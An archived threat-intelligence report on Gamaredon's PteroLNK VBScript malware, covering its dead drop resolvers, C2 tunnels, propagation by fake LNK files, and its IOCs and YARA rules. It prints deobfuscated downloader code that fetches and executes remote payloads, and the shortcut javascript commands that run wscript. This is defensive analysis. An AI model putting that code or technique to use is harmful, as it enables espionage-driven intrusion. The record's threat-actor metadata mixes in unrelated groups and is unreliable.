{ "id": "d4e894c8-5186-42b8-9e6d-8af54fe8c0f2", "created_at": "2026-04-06T00:12:20.137289Z", "updated_at": "2026-04-10T03:37:04.24177Z", "deleted_at": null, "sha1_hash": "358e912932c6cabc6c096988d0c425b0d856acbb", "title": "Inside Gamaredon's PteroLNK: Dead Drop Resolvers and evasive Infrastructure", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 943688, "plain_text": "Inside Gamaredon's PteroLNK: Dead Drop Resolvers and evasive\r\nInfrastructure\r\nPublished: 2025-04-16 · Archived: 2026-04-05 13:29:40 UTC\r\nHome » Inside the Lab » Inside Gamaredon’s PteroLNK: Dead Drop Resolvers and evasive Infrastructure\r\nPublished on 16 April, 2025 18min\r\nIdentifier: TRR250401.\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 1 of 13\n\nProactively hunting for Russian-nexus threats, we identified samples from the Pterodo malware family, commonly\r\nassociated with Gamaredon, uploaded to a public malware analysis platform between late 2024 and mid-March\r\n2025. Notably, related Gamaredon Dead Drop Resolvers (DDR) are still being updated daily, indicating active\r\noperations.\r\nThe Pterodo malware ecosystem has been previously documented by ESET in 2024, covering the years 2022-\r\n2023. Broader coverage of Gamaredon is inversely proportional to the group’s proliferation and impact. Existing\r\npublications on Gamaredon often focus on samples that are not publicly available, which limits the ability of the\r\nsecurity community to conduct further analysis and research. Importantly, we found no publicly available analysis\r\nof the specific malware samples discussed in this report.\r\nThis report provides a detailed technical analysis of Gamaredon’s PteroLNK VBScript malware and its supporting\r\ninfrastructure. Victimology insights are derived from gathered samples’ contents and the limited context they\r\nprovide.\r\nPteroLNK\r\nPteroLNK VBScript files are heavily obfuscated, a hallmark of Gamaredon’s techniques. The main script\r\ndynamically constructs two additional VBScript payloads during execution: a downloader and an LNK dropper.\r\nThe malware structure remains consistent with past samples analyzed by ESET in 2023-2024.\r\nThe scripts are designed to allow flexibility for their operators, enabling easy modification of parameters such as\r\nfile names and paths, persistence mechanisms (registry keys and scheduled tasks), and detection logic for security\r\nsolutions on the target system.\r\nThe primary PteroLNK VBScript (MD5 98CF1A959F11AF59BD5AC2C2D746541F ) is tasked with deploying the two\r\nbase64-encoded payloads, establishing persistence through scheduled tasks, and concealing its activities by\r\nmodifying Windows Explorer settings to hide files. Upon execution, it drops a copy of itself to:\r\n%PUBLIC%NTUSER.DAT.TMContainer\r\n%APPDATA%~.drv\r\nAnd deploys the two script payloads to:\r\n%PUBLIC%NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms – Downloader (MD5\r\nA38399ECB70B504573CE708C7A26C306 )\r\n%PUBLIC%NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms – LNK Dropper (MD5\r\n09958DEBBD3336D374892D92C8939D75 )\r\nThe downloader payload is scheduled to execute every 3 minutes, while the LNK dropper script runs every 9\r\nminutes. The malware also incorporates conditional execution logic to adapt its behaviour on the presence of the\r\n“360 Total Security” antivirus on the host system. If this antivirus is detected, the execution of both payload and\r\ntheir persistence mechanisms are shifted from scheduled tasks to an infinite loop. In this scenario, no actions are\r\ntaken to conceal files either.\r\nDownloader\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 2 of 13\n\nThis payload serves as a downloader which is designed to retrieve and deploy additional malware. It employs a\r\nmodular, multi-stage structure to establish and maintain communication with its C2 infrastructure.\r\nEach stage is triggered by an increasing error counter, enabling the malware to pivot between fallback\r\nmechanisms. The Windows registry is leveraged to persistently store and retrieve the C2 addresses across\r\nexecution cycles.\r\nHere is an example of a Downloader (MD5 A38399ECB70B504573CE708C7A26C306 ) main function code,\r\ndeobfuscated for readability:\r\nOn Error Resume Next\r\nDim userAgent, response, executionResult, url, errorCounter, computerName, serialNumber, extractedText, regexPat\r\nerrorCounter = 0\r\nDDR = \"hxxps://telegra[.]ph/Vizit-12-28\"\r\nregexPattern = \"\\\u003c\\/address\\\u003e\\\u003cp\\\u003e(.*?)\\\u003c\\/p\\\u003e\\\u003c\\/article\\\u003e\"\r\nC2RegKey = ReadRegistry(\"WindowsUpdates\")\r\nC2BackupRegKey = ReadRegistry(\"WindowsResponby\")\r\nIf (Len(C2RegKey) \u003e 10) Then\r\n url = C2RegKey\r\nEnd If\r\nIf (Len(C2RegKey) \u003c 21) Then\r\n url = C2BackupRegKey\r\n If (Len(C2BackupRegKey) \u003c 21) Then\r\n errorCounter = errorCounter + 1\r\n End If\r\nEnd If\r\nSleep 1439\r\nuserAgent = CreateUserAgent(\"Join\")\r\nSleep 1848\r\nexecutionResult = ProcessPayload(userAgent)\r\nDo Until executionResult = \"\"\r\n Sleep 1848\r\n ExecuteGlobal(executionResult)\r\n Sleep 21493\r\n executionResult = ProcessPayload(userAgent)\r\nLoop\r\nUpon execution, the script attempts to read existing C2 addresses from previous runs stored in the\r\nHKEY_CURRENT_USERConsoleWindowsUpdates (primary C2) and HKEY_CURRENT_USERConsoleWindowsResponby\r\n(backup C2) registry keys. It then generates a custom HTTP “User-Agent” string containing the computer name\r\nand system drive serial number, uniquely identifying the infected machine to the C2 server. This string is spliced\r\nrandomly between two predefined User-Agent templates embedded within the malware.\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 3 of 13\n\nGenerated User-Agent example:\r\nUser-Agent: Mozilla/5.0 (Windows N ::USER-PC_11223344::/.nJoin/.T 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, l\r\nThe script begins by checking for internet connectivity via a benign website. Any HTTP status code other than 404\r\n(Not Found) or 200 (OK) increments the global error counter. As this counter increases, additional requests will be\r\ngenerated for each execution iteration.\r\nIf a C2 address is already stored in the backup C2 registry key from previous executions, the script sends a simple\r\nrequest to an Ukrainian streaming service: sweet.tv . Otherwise, the first request will be sent to the Ukrainian\r\nnews site ukr.net , alongside a request to the hardcoded dead drop resolver (DDR) at\r\nhxxps://telegra[.]ph/Vizit-12-28 . The DDR response is parsed using a hardcoded regex pattern to extract an\r\nupdated C2 address:\r\nNext, the script sends another HTTP GET request to the extracted C2 tunnel address, which is hosted on\r\ntrycloudflare.com , using its custom User-Agent. If the tunnel responds with a 404 status code, it extracts an\r\nupdated C2 from the response. It saves the domain portion in the WindowsResponby (backup C2) registry key and\r\nthe URI portion in the WindowsDetect (C2 URI) registry key. If any errors were encountered during execution, a\r\ncopy of the C2 domain is saved under the registry key WindowsUpdates (primary C2) as well.\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 4 of 13\n\nGET /comp/\u003cREDACTED\u003e HTTP/1.1\r\nAccept: */*\r\nAccept-Language: uk-UA\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ::USER-PC_11223344::\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nHost: des-cinema-democrat-san.trycloudflare[.]com\r\nConnection: Keep-Alive\r\nHTTP/1.1 404 Not Found\r\nDate: \u003cREDACTED\u003e\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nCF-Ray: \u003cREDACTED\u003e\r\nCF-Cache-Status: DYNAMIC\r\nVary: Accept-Encoding\r\nServer: cloudflare\r\nContent-Encoding: gzip\r\nhxxps://sign-nothing-fitted-intelligence.trycloudflare[.]com/@din3/VByOMkbbyIt?\u003cREDACTED\u003e\r\nIf the error counter increases further, the script attempts to reach bbc.com while querying another DDR hosted\r\non teletype.in . The DDR address is dynamically constructed from the URI extracted from the previous C2\r\ntunnel response (see above @din3/VByOMkbbyIt... ) and saved in the C2 URI registry key ( WindowsDetec ). The\r\nresulting DDR in our example looks like: hxxps://teletype[.]in/@din3/VByOMkbbyIt?... . From this new DDR,\r\nanother C2 address is fetched using Internet Explorer and parsed with a new regex pattern:\r\n\\\u003c\\!--\\[--\\\u003e\\\u003c\\!--\\]--\\\u003e\\\u003c\\!--\\[--\\\u003e(.*?)\\\u003c\\!--\\]--\\\u003e\\\u003c\\/p\\\u003e\\\u003c\\!--\\]--\\\u003e\\\u003c\\/article\\\u003e\\\u003c\\!----\\\u003e\r\nThe extracted address is prepended with https:// and saved in the primary C2 registry key.\r\n\u003ch1 class=\"article__header_title\" itemprop=\"headline\" data-v-8e275b20\u003ekisa\u003c/h1\u003e\u003c/header\u003e\u003carticle class=\"article\r\nIf further errors occur, the script attempts to reach the russian news site vesti.ru , while leveraging check-host.net to resolve another hard-coded C2 domain formatted as \u003c2-digits\u003e\u003cword\u003e.mahombres[.]ru . The IP\r\nresolution provided by check-host.net is prefixed with http:// and stored in the primary C2 registry key.\r\nWhile check-host.net attempts to block abuse of its service for resolving these C2s, it still provides resolutions\r\nfor some domains.\r\nOn each execution iteration, the script processes server responses expected to contain Base64-encoded VBScript\r\npayloads. These payloads are decoded and executed on the infected system.\r\nLNK Dropper:\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 5 of 13\n\nThe purpose of this payload is to propagate through local and network drives, systematically replacing existing\r\nfiles and folders with deceptive shortcuts and hiding the original files. These shortcuts are configured to execute\r\nthe main PteroLNK VBScript malware, which is also copied to the same folder as the LNK files, via mshta.exe .\r\nThis mechanism allows PteroLNK to propagate to other hosts sharing the same storage, by having users execute\r\nthese links.\r\nUpon execution, the malware modifies the registry in order to hide hidden files and folders, extensions and\r\nprotected OS files. It then enumerates local and mapped drives, and for each .pdf , .docx and .xlsx file in\r\nthe root of the drive, it creates a malicious shortcut that mimics the original file, while hiding it. The malware\r\nensures that at least two shortcuts are present, otherwise it will choose a filename from an array of military-themed decoy filenames in Ukrainian, to generate additional malicious shortcut files. It then copies the main\r\nPteroLNK script ( ~.drv ) to the current folder, saving it using the same filename ~.drv , and also as ~.tmp ,\r\n~.ini , if those files already exist. This process repeats for subfolders up to three levels deep.\r\nThe Ukrainian decoy filenames that can be used are:\r\nOriginal Ukrainian Translated\r\nТаємно Secretly\r\nДля службового користування For official use\r\nЗобовязання Obligation\r\nІнформація щодо загиблих Casualty information\r\nЗаявка ОК Application (Operational Command)\r\nВkaзівkи Instructions\r\nДля службового користування For official use\r\nЗразок рапорту щомісяця Sample monthly report\r\nСупровід Escort/Support\r\nБЛАНК ДОНЕСЕННЯ Report form\r\nСупровід ГУР Support of the Main Intelligence Directorate\r\nпродовження контракту Contract extension\r\nрнбо National Security and Defense Council (NSDC)\r\nІнженерна служба Engineering service\r\nзaoхoчeння Incentive\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 6 of 13\n\nThe behaviour of the generated shortcuts depends on whether they replace existing, now-hidden documents and\r\nfolders, or if they are created using decoy filenames for non-existing files. Shortcuts replacing originals will\r\nattempt to open the original document of folder before executing PteroLNK, while shortcuts created with decoy\r\nfilenames will directly execute PteroLNK.\r\nIn both cases, the shortcuts contains a javascript command which leverages wscript.exe :\r\n// Fake shortcuts for existing files/folders:\r\njavascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"explorer $FILE_PATH$\\\"\");w.run(\\\"\"wscript.e\r\n// Shortcuts generated using the hardcoded decoy filenames:\r\njavascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"wscript.exe //e:vb\"\"+\"\"Script \\~.drv \\\"\");w\r\nInfrastructure\r\nGamaredon uses Telegraph and Teletype articles as Dead Drop Resolver (DDR), which they frequently update\r\n(see Fig. 3 below). These DDRs usually contain a Cloudflare quick tunnel address, but sometimes they briefly\r\npoint to a domain controlled by Gamaredon.\r\nCloudFlare tunnels can be setup without registration and with the ease of running a simple command, and passing\r\nit a URL that the tunnel will redirect to: cloudflared tunnel --url google.com .\r\nCloudflare quick tunnels have existed for over 5 years and have been increasingly adopted by threat actors, given\r\ntheir anonymity and ability to traverse network detection by blending with legitimate traffic. The tunnels remain\r\nactive as long as the actor maintains an open command-line session and can handle up to 200 concurrent requests\r\nper tunnel, making them ideal for low-profile C2 operations.\r\nDead Drop Resolvers\r\nThe Dead Drop Resolvers (DDRs) act as the initial communication node for the samples, and are hard-coded\r\nwithin them, making them arguably the most critical component of the malware infrastructure. DDRs provide\r\nGamaredon with great flexibility, allowing them to update the next communication channel as often as needed to\r\nevade detection or disruption.\r\nA timeline analysis of the DDR creation reveals that the earliest DDR was established on December 28, 2024,\r\nwhile the most recent dynamically generated DDR was created on March 26, 2025. Interestingly, the earliest\r\nsample of this PteroLNK variant, uploaded on December 25, 2024, didn’t utilize a DDR. Instead, it directly\r\nleveraged the check-host.net technique to resolve its C2 tienes[.]ru .\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 7 of 13\n\nBelow is an interactive figure illustrating a cluster of still active DDRs and their recent update fequency between\r\nMarch 24 and April 10, 2025:\r\nIn addition to DDRs utilized by the samples, we identified five C2 domains controlled by Gamaredon, all\r\nregistered via REGRU-RU. At the time of analysis, these domains were also hosted on Cloudflare services.\r\nNotably, Cloudflare had flagged some of them as ‘Suspected Phishing’, triggering a warning message when\r\naccessed. This effectively disrupts the retrieval of payloads from these domains by the analyzed malware.\r\nTargets\r\nThe samples analyzed in this report were predominantly uploaded to online multiscanners from Kyiv, Ukraine,\r\nwith some coming from Dnipro, Rivne, Kupyansk and Odesa between December 2024 and February 2025. This\r\ngeographic clustering aligns with Gamaredon’s focus on Ukrainian targets, particularly government, military and\r\ncritical infrastructure entities.\r\nThe lure filenames used in these samples referenced themes pertaining to the Ukrainian military, such as personnel\r\nlogistics and operational planning. Additionally, the samples were configured to beacon to benign Ukrainian\r\nwebsites, such as ukr.net and streaming services like sweet.tv .\r\nAttribution: Gamaredon’s FSB links and ties to longstanding campaigns\r\nThe samples analyzed closely match the PteroLNK description provided by ESET, from the obfuscation methods\r\nto the structure of the payloads within it and their objectives. This consistency strongly supports the attribution of\r\nthe activity to Gamaredon.\r\nSeveral key findings further reinforce this attribution:\r\nOn March 27th, around 09:00 UTC, the contents of the DDR hxxps://telegra[.]ph/Vizit-12-28 was\r\nupdated to point to hxxps://nandayo[.]ru/srgssdfsf . The domain nandayo[.]ru prevously resolved to\r\nIP addresses used as C2 infrastructure for Gamaredon implants ( 194.67.71[.]128 , 31.129.22[.]156 )\r\nand directly by Gamaredon malware1.\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 8 of 13\n\nOn March 31st, a dynamically generated backup DDR hxxps://teletype[.]in/@mew31/y4JyD2Rpb41\r\nstarted pointing to kimiga[.]ru . The domain kimiga[.]ru has been associated with Gamaredon\r\nmultiple times in prior campaigns.\r\nGamaredon has historically used ntuser.dat.tmcontainer as payload filenames, and otherwise prefixes\r\ndropped malware filenames with NTUSER.DAT.TM .\r\nRecent reports by security vendors confirm Gamaredon’s use of CloudFlare quick tunnels for C2\r\ninfrastructure.\r\nThe custom User-Agent beacon delimiter format identified in the samples analyzed has been associated\r\nwith Gamaredon since at least 20222.\r\nGamaredon-controlled domains were all registered via REGRU-RU, a registrar consistently used by\r\nGamaredon in past campaigns.\r\nFinally, the victimology further reinforces the attribution of this activity to Gamaredon. The campaign targeted\r\nUkrainian entities using military-themed lures, consistent with Gamaredon’s long-standing focus on Ukrainian\r\ngovernment, military, and critical infrastructure sectors.\r\nGamaredon is widely believed to be associated with Russia’s Federal Security Service (FSB), based on\r\ncompelling evidence provided by Ukrainian authorities and corroborated by multiple independent researchers.\r\nReports link Gamaredon to FSB teams operating within the electronic and signals intelligence and information\r\nsecurity centers realms, allegedly operating out of Crimea.\r\nConclusions: Gamaredon role, strategy and adaptiveness\r\nGamaredon operates as a critical component of Russia’s cyber operations strategy, particularly in its ongoing war\r\nwith Ukraine. The group’s campaigns have been observed during pivotal phases of the conflict, including\r\nUkraine’s 2023 counteroffensive, highlighting their role in gathering intelligence and disrupting Ukrainian\r\noperations in support of Russia’s military objectives.\r\nGamaredon’s effectiveness lies not in technical sophistication but in tactical adaptability. Their modus operandi\r\ncombines aggressive spearphishing campaigns, rapid deployment of heavily obfuscated custom malware, and\r\nredundant C2 infrastructure. This approach enables them to consistently evade detection, as evidenced by low\r\ndetection rates of their malware. The group prioritizes operational impact over stealth, exemplified by pointing\r\ntheir DDRs to long-standing domains publicly linked to their past operations.\r\nAs the conflict evolves, understanding Gamaredon’s tactics and tooling will be critical not only for defending\r\nagainst their operations but also for mitigating possible copycat actors adopting similar techniques across Europe.\r\nThis report provides actionable detection signatures, complete hashes and infrastructure indicators for the\r\nanalyzed samples, all available on online multi-scanners.\r\nAppendix: indicators and detection rules\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 9 of 13\n\nHashes (SHA-256)\r\n0cec5ca5d2fe9616a275b54ca37f45248e1ed6e15f627d6bffb566ffd6295208|PteroLNK VBScript, ~.drv\r\n913e2001d1b13711728ff63fa44b720e5a6d464a68be2e3e72a091bd6c245de1|PteroLNK VBScript, ~.drv\r\nd0b6e053a967db89cd6492beb5202be67b7fd7be8f7eb1d60905310a4bfb9ea8|PteroLNK VBScript, ~.drv\r\n1bd6df231f94053b33ae6becb9e49894236a123b82e62eaedf566e8d2572e018|PteroLNK VBScript, ~.drv\r\n1c32b8ee9442e7e6d0e2e61fb15d3beea9db2fe77d2f70b38ce05eab7c6933f6|PteroLNK VBScript, ~.drv\r\n5062ca28db713d36e2523f0a041ccde2ea563e3d20c436197e8d33ec3025f3be|PteroLNK VBScript, ~.drv\r\n28166ea98915ce5c07108bae1ae116d7eeab3fceb64d9564dd2d483cdc2c5e1c|PteroLNK VBScript, ~.drv\r\nd5538812b9a41b90fb9e7d83f2970f947b1e92cb68085e6d896b97ce8ebff705|PteroLNK VBScript, ~.drv\r\n582075b7d84fd7233359ede009ae5ccd9c05d06087e4eebf2fcde86286a67938|PteroLNK VBScript, ~.drv\r\nab7b9e5025b9095a4fcf76dfa5becc12bd219de84bd2a300371cc303af4463f4|PteroLNK VBScript, ~.drv\r\nFile paths\r\n%PUBLIC%\\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms|PteroLNK downloader payload\r\n%PUBLIC%\\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms|PteroLNK LNK dropeer payload\r\n%PUBLIC%\\NTUSER.DAT.TMContainer|PteroLNK VBScript\r\n%APPDATA%\\~.drv|PteroLNK VBScript\r\nScheduled tasks\r\n\\Windows\\DeviceDirectoryClient\\RegisterUserDevice|PteroLNK downloader payload\r\n\\Windows\\DeviceDirectoryClient\\RegisterDeviceConnectedToNetwork|PteroLNK LNK dropper payload\r\nRegistry keys\r\nHKEY_CURRENT_USER\\Console\\WindowsUpdates|C2 registry key\r\nHKEY_CURRENT_USER\\Console\\WindowsResponby|C2 registry key\r\nHKEY_CURRENT_USER\\Console\\WindowsDetect|C2 registry key\r\nDomains\r\ntienes[.]ru|Gamaredon C2\r\nmahombres[.]ru|Gamaredon C2\r\nkimiga[.]ru|Gamaredon C2\r\nareyouall[.]ru|Gamaredon C2\r\nnandayo[.]ru|Gamaredon C2\r\nHostnames\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 10 of 13\n\ndes-cinema-democrat-san.trycloudflare[.]com|Cloudflare quick tunnel\r\nsatin-adams-writings-idol.trycloudflare[.]com|Cloudflare quick tunnel\r\nsuch-bad-magnet-dealer.trycloudflare[.]com|Cloudflare quick tunnel\r\nchaos-forces-bears-sent.trycloudflare[.]com|Cloudflare quick tunnel\r\ncups-technologies-knock-posts.trycloudflare[.]com|Cloudflare quick tunnel\r\ncables-encounter-chem-stranger.trycloudflare[.]com|Cloudflare quick tunnel\r\nasset-advised-jane-disc.trycloudflare[.]com|Cloudflare quick tunnel\r\nrecreational-bosnia-granny-interventions.trycloudflare[.]com|Cloudflare quick tunnel\r\ngovernmental-rocket-hourly-blair.trycloudflare[.]com|Cloudflare quick tunnel\r\nsilence-modems-france-fact.trycloudflare[.]com|Cloudflare quick tunnel\r\nextend-terrorism-nowhere-two.trycloudflare[.]com|Cloudflare quick tunnel\r\ntaking-hl-kerry-pet.trycloudflare[.]com|Cloudflare quick tunnel\r\nhorizon-fee-calendar-seek.trycloudflare[.]com|Cloudflare quick tunnel\r\nrows-slideshow-toll-dsl.trycloudflare[.]com|Cloudflare quick tunnel\r\nblowing-traveling-looks-appropriations.trycloudflare[.]com|Cloudflare quick tunnel\r\nmaking-toys-sn-kijiji.trycloudflare[.]com|Cloudflare quick tunnel\r\nchecklist-digital-proved-labels.trycloudflare[.]com|Cloudflare quick tunnel\r\nim-trend-naturally-administrator.trycloudflare[.]com|Cloudflare quick tunnel\r\ndressed-emissions-councils-storage.trycloudflare[.]com|Cloudflare quick tunnel\r\nsand-northeast-consumers-sells.trycloudflare[.]com|Cloudflare quick tunnel\r\narchitect-reverse-poster-failed.trycloudflare[.]com|Cloudflare quick tunnel\r\nmailed-this-chemical-thermal.trycloudflare[.]com|Cloudflare quick tunnel\r\nadjustable-za-creativity-copper.trycloudflare[.]com|Cloudflare quick tunnel\r\namenities-minus-judges-clearly.trycloudflare[.]com|Cloudflare quick tunnel\r\nzambia-relate-highlights-tasks.trycloudflare[.]com|Cloudflare quick tunnel\r\nadventures-worked-exposure-maui.trycloudflare[.]com|Cloudflare quick tunnel\r\nasks-ribbon-nearest-traveler.trycloudflare[.]com|Cloudflare quick tunnel\r\nrelax-spas-miss-feeling.trycloudflare[.]com|Cloudflare quick tunnel\r\nsized-professionals-expertise-reveals.trycloudflare[.]com|Cloudflare quick tunnel\r\nsat-mapping-metadata-instrumentation.trycloudflare[.]com|Cloudflare quick tunnel\r\ndimensions-incorporated-citysearch-quotes.trycloudflare[.]com|Cloudflare quick tunnel\r\nfunky-honduras-drives-statutory.trycloudflare[.]com|Cloudflare quick tunnel\r\noutputs-sam-come-bosnia.trycloudflare[.]com|Cloudflare quick tunnel\r\nefficiently-noble-pubs-armed.trycloudflare[.]com|Cloudflare quick tunnel\r\nplace-experiencing-teen-kitty.trycloudflare[.]com|Cloudflare quick tunnel\r\ncat-pop-injuries-gallery.trycloudflare[.]com|Cloudflare quick tunnel\r\ncompact-egypt-meal-imagination.trycloudflare[.]com|Cloudflare quick tunnel\r\nstockholm-align-closed-far.trycloudflare[.]com|Cloudflare quick tunnel\r\ncope-senator-european-texas.trycloudflare[.]com|Cloudflare quick tunnel\r\nplaystation-look-became-circles.trycloudflare[.]com|Cloudflare quick tunnel\r\nfixtures-bracelet-anatomy-jon.trycloudflare[.]com|Cloudflare quick tunnel\r\nengineering-moreover-packages-shareholders.trycloudflare[.]com|Cloudflare quick tunnel\r\napplicant-approx-vatican-senators.trycloudflare[.]com|Cloudflare quick tunnel\r\nwallpaper-duplicate-agents-exports.trycloudflare[.]com|Cloudflare quick tunnel\r\nadvisors-commission-burn-valuation.trycloudflare[.]com|Cloudflare quick tunnel\r\nwto-ls-stocks-pie.trycloudflare[.]com|Cloudflare quick tunnel\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 11 of 13\n\nforces-details-round-gates.trycloudflare[.]com|Cloudflare quick tunnel\r\nspectrum-maldives-literally-garcia.trycloudflare[.]com|Cloudflare quick tunnel\r\nperformances-look-humidity-pie.trycloudflare[.]com|Cloudflare quick tunnel\r\nunlike-processes-saskatchewan-prepared.trycloudflare[.]com|Cloudflare quick tunnel\r\nURLs\r\nhxxps://telegra[.]ph/Vizit-12-28|Dead drop resolver\r\nhxxps://telegra[.]ph/Post-12-20-7|Dead drop resolver (inactive)\r\nhxxps://graph[.]org/LifeNews-02-20|Dead drop resolver\r\nhxxps://telegra[.]ph/VectorsWar-03-06|Dead drop resolver\r\nhxxps://telegra[.]ph/mark-01-20-5|Dead drop resolver\r\nhxxps://telegra[.]ph/Leons-01-13|Dead drop resolver (inactive)\r\nhxxps://telegra[.]ph/Kasiopeya-01-09|Dead drop resolver (inactive)\r\nhxxps://teletype[.]in/@dc1/p9G48lhQVjw |Dead drop resolver (inactive)\r\nhxxps://teletype[.]in/@din3/VByOMkbbyIt|Dead drop resolver\r\nhxxps://teletype[.]in/@mew31/y4JyD2Rpb41|Dead drop resolver\r\nPossibly associated URLs\r\nhxxps://telegra[.]ph/Simphoniya-03-07|Possibly an inactive dead drop resolver\r\nYara rules\r\nrule Gamaredon_PteroLNK_VBScript {\r\n meta:\r\n description = \"Matches Gamaredon PteroLNK VBScript samples used in early 2025\"\r\n references = \"TRR250401\"\r\n hash = \"d5538812b9a41b90fb9e7d83f2970f947b1e92cb68085e6d896b97ce8ebff705\"\r\n date = \"2025-04-04\"\r\n author = \"HarfangLab\"\r\n context = \"file\"\r\n strings:\r\n $vbs = \"on error resume next\" ascii wide\r\n $a1 = \"=\\\"b24gZXJyb3IgcmVzdW1lIG5leHQNC\" ascii wide\r\n $b1 = \"\\\"\\\"%PUBLIC%\\\"\\\"\" ascii wide\r\n $b2 = \"\\\"\\\"%APPDATA%\\\"\\\"\" ascii wide\r\n $b3 = \"\\\"\\\"REG_DWORD\\\"\\\"\" ascii wide\r\n condition:\r\n filesize \u003c 400KB\r\n and $vbs in (0..2)\r\n and $a1\r\n and 1 of ($b*)\r\n}\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 12 of 13\n\nrule Gamaredon_PteroLNK_LNK {\r\n meta:\r\n description = \"Matches Gamaredon PteroLNK-generated LNK files used in early 2025\"\r\n references = \"TRR250401\"\r\n hash = \"N/A\"\r\n date = \"2025-04-04\"\r\n author = \"HarfangLab\"\r\n context = \"file\"\r\n strings:\r\n $a1 = \"javascript:eval('w=new%20ActiveXObject(\\\\\\\"\\\"WScript.Shell\\\\\\\"\\\");w.run(\\\\\\\"\\\"wscript.exe //e:vb\\\r\n $a2 = \"javascript:eval('w=new%20ActiveXObject(\\\\\\\"\\\"WScript.Shell\\\\\\\"\\\");w.run(\\\\\\\"\\\"explorer\" ascii wid\r\n $b1 = \"\\\"\\\");window.close()')\" ascii wide nocase\r\n condition:\r\n filesize \u003c 10KB\r\n and uint32(0) == 0x0000004C // Standard LNK signature\r\n and uint32(4) == 0x00021401 // Expected values for LNK header\r\n and 1 of ($a*)\r\n and $b1\r\n}\r\nSource: https://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/" ], "report_names": [ "gamaredons-pterolnk-analysis" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf", "created_at": "2022-10-25T16:07:24.467088Z", "updated_at": "2026-04-10T02:00:05.000485Z", "deleted_at": null, "main_name": "Circles", "aliases": [], "source_name": "ETDA:Circles", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434340, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/358e912932c6cabc6c096988d0c425b0d856acbb.pdf", "text": "https://archive.orkl.eu/358e912932c6cabc6c096988d0c425b0d856acbb.txt", "img": "https://archive.orkl.eu/358e912932c6cabc6c096988d0c425b0d856acbb.jpg" } }